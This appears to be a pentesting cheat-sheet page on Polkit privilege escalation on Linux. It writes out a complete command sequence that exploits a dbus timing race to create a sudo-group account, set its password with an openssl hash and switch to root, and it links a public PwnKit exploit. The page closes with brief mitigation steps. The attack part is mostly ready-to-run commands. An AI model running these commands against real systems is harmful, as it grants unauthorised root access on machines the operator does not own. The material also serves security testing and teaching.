PolKit Privilege Escalation
Last modified: 2023-07-24
Polkit (PolicyKit) is a component for controlling system-wide privileges in Unix-like operating systems. It provides an organized way for non-privileged processes to communicate with privileged ones.
Create a new user by sending a dbus message.
# string:tester: The new user named "tester". # string:"Tester Account": The description of the new user. # int32:1: sudo group dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:tester string:"Tester Account" int32:1 & sleep 0.005s; kill $!
Then check the new user ID (uid).
id tester uid=1000(tester) gid=1000(tester) groups=1000(tester),27(sudo)
# -6: SHA512 openssl passwd -6 password123
Copy the output hash.
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1000 org.freedesktop.Accounts.User.SetPassword string:'<password_hash>' string:'Ask the tester' & sleep 0.005s; kill $!
Enter the password you created e.g. “password123”.
Now change to root .
sudo -s # or sudo su root
PwnKit is vulnerability of Polkit to local privilege escalation.
There are many exploits available. Below are examples:
- https://github.com/Almorabea/pkexec-exploit (this is written by Python)
To avoid the vulnerability, unset setuid from the pkexec executable.
sudo chmod 0755 /usr/bin/pkexec # or sudo chmod 0755 `which pkexec`
Or simply upgrade the apt packages in most of distributions which are patched for the vulnerability.
sudo apt update && sudo apt upgrade